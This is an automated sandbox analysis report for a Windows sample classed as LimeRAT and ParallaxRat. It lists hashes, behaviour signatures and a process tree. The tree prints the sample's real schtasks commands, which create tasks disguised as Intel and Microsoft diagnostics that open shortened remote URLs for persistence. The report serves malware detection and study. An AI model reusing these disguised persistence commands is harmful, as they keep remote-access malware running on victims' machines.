Overview

overview

10

Static

static

10

2e45c3146b...11.exe

windows7_x64

10

2e45c3146b...11.exe

windows10_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    03-11-2021 07:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2e45c3146bebd87ccef96e054374ea11.exe

  • Size

    645KB

  • MD5

    2e45c3146bebd87ccef96e054374ea11

  • SHA1

    f2be6622242c311beb54f984c2fd85b865c2431c

  • SHA256

    df6fa5b55c8196df0a53575cd26f5a7e53146899d41ab1a1a3acdb320f185d1f

  • SHA512

    4277153eaea844fdcd1ab7920d290f7a877a2a46e6d71b5b962f445395e7c0299e859409fb52e96920bc31ab6d7ed2be81e69021c0145585984dc57c76469b51

Score
10/10
limeratparallaxpersistencerat

Malware Config

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

    ratlimerat
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • ParallaxRat

    ParallaxRat is a multipurpose RAT written in MASM.

    ratparallax
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe
    "C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /C schtasks /create /f /st "18:31" /sc weekly /mo "24" /d "Sun" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2sabzMS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /st "18:31" /sc weekly /mo "24" /d "Sun" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2sabzMS"
        3⤵
        • Creates scheduled task(s)
        PID:3464
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /C schtasks /create /f /st "12:25" /sc monthly /m "sep" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'https://bit.ly/3iVN7Vd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /st "12:25" /sc monthly /m "sep" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'https://bit.ly/3iVN7Vd"
        3⤵
        • Creates scheduled task(s)
        PID:2832
    • C:\Users\Admin\AppData\Roaming\security\wowreg32.exe
      "C:\Users\Admin\AppData\Roaming\security\wowreg32.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "21:53" /sc daily /mo "3" /tn "" /tr "'explorer'C_Settings.URL1"
        3⤵
        • Creates scheduled task(s)
        PID:2028
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /f /st "06:30" /sc daily /mo "7" /tn "" /tr "'explorer'C_Settings.URL2"
        3⤵
        • Creates scheduled task(s)
        PID:1352
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2376 -s 3732
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:3044

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2376-130-0x0000000003052000-0x0000000003054000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2376-136-0x000000001D394000-0x000000001D397000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2376-141-0x000000001D39B000-0x000000001D39E000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2376-127-0x0000000003050000-0x0000000003052000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2376-139-0x000000001D3A1000-0x000000001D3A6000-memory.dmp

    Filesize

    20KB

    Download

  • memory/2376-140-0x000000001D3A6000-0x000000001D3AB000-memory.dmp

    Filesize

    20KB

    Download

  • memory/2376-138-0x000000001D39C000-0x000000001D3A1000-memory.dmp

    Filesize

    20KB

    Download

  • memory/2376-131-0x0000000003054000-0x0000000003056000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2376-133-0x0000000003058000-0x000000000305A000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2376-132-0x0000000003056000-0x0000000003058000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2376-134-0x000000000305A000-0x000000000305F000-memory.dmp

    Filesize

    20KB

    Download

  • memory/2376-135-0x000000001D390000-0x000000001D394000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2376-137-0x000000001D397000-0x000000001D39C000-memory.dmp

    Filesize

    20KB

    Download

  • memory/2724-115-0x00000000001D0000-0x00000000001D1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2724-117-0x000000001AF30000-0x000000001AF32000-memory.dmp

    Filesize

    8KB

    Download